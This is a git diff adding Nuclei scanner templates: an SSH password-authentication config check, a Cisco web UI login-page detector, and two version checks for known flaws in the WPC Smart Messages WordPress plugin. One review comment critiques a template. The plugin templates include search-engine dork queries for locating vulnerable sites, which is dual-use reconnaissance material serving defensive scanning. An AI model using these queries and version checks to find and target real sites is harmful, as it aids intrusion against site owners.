+ name: Use SSH Key-Based Authentication
+ author: pussycat0x
+ severity: info
+ description: |
+ SSH key-based authentication is more secure than password-based authentication.
+ remediation: |
+ Change it to : PasswordAuthentication no
+ reference:
+ - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f
+ - https://www.digitalocean.com/community/tutorials/how-to-configure-ssh-key-based-authentication-on-a-linux-server
+ tags: audit,config,file,ssh
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ words:
+ - "PasswordAuthentication yes"
diff --git a/poc/web/webui-login.yaml b/poc/web/webui-login.yaml
new file mode 100644
index 0000000000..6f3339ee58
--- /dev/null
+++ b/poc/web/webui-login.yaml
@@ -0,0 +1,25 @@
+id: webui-login
+info:
+ name: Web UI Login Page Detection
+ author: drewvravick
+ severity: high
+ description: |
+ Detects the presence of a web UI login page.
+ tags:
+ - web
+ - login
+
+requests:
+ - name: Web UI Login Page
+ path:
+ - "{{BaseURL}}/webui/"
+ method: GET
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "cisco"
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/poc/wordpress/wpc-smart-messages-504d2223497cf2c2514151c40b405179.yaml b/poc/wordpress/wpc-smart-messages-504d2223497cf2c2514151c40b405179.yaml
new file mode 100644
index 0000000000..ccd04cedeb
--- /dev/null
+++ b/poc/wordpress/wpc-smart-messages-504d2223497cf2c2514151c40b405179.yaml
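Review bot: `severity: high` is not supported by a template whose own description is `Detects the presence of a web UI login page.`; a login-page fingerprint is informational, and `info` is the severity the rest of this patch uses for detections. The single word `cisco` in `words` is unanchored and case-sensitive, so any page that mentions the vendor in lowercase matches and a page that writes `Cisco` does not; a second marker specific to the `/webui/` page would make the match meaningful. `requests:` is the pre-v3 key (current templates use `http:`), and `tags` is written as a YAML list while every other template in this patch uses the comma-separated string form.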
@@ -0,0 +1,59 @@
+id: wpc-smart-messages-504d2223497cf2c2514151c40b405179
+
+info:
+ name: >
+ WPC Smart Messages for WooCommerce <= 4.2.1 - Authenticated (Subscriber+) Local File Inclusion
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0fd87512-def0-4e59-aa2d-b166919474f3?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wpc-smart-messages/"
+ google-query: inurl:"/wp-content/plugins/wpc-smart-messages/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wpc-smart-messages,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wpc-smart-messages/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wpc-smart-messages"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.2.1')
\ No newline at end of file
diff --git a/poc/wordpress/wpc-smart-messages-bd63fbb32b56e3848c8cdcc2c3f2fd2f.yaml b/poc/wordpress/wpc-smart-messages-bd63fbb32b56e3848c8cdcc2c3f2fd2f.yaml
new file mode 100644
index 0000000000..02ffea1558
--- /dev/null
+++ b/poc/wordpress/wpc-smart-messages-bd63fbb32b56e3848c8cdcc2c3f2fd2f.yaml
@@ -0,0 +1,59 @@
+id: wpc-smart-messages-bd63fbb32b56e3848c8cdcc2c3f2fd2f
+
+info:
+ name: >
+ WPC Smart Messages for WooCommerce <= 4.2.1 - Missing Authorization to Authenticated (Subscriber+) Message Activation/Deactivation
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4acb4fda-0217-44b9-a85e-64807eb4a011?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wpc-smart-messages/"
+ google-query: inurl:"/wp-content/plugins/wpc-smart-messages/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wpc-smart-messages,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wpc-smart-messages/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wpc-smart-messages"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.2.1')
\ No newline at end of file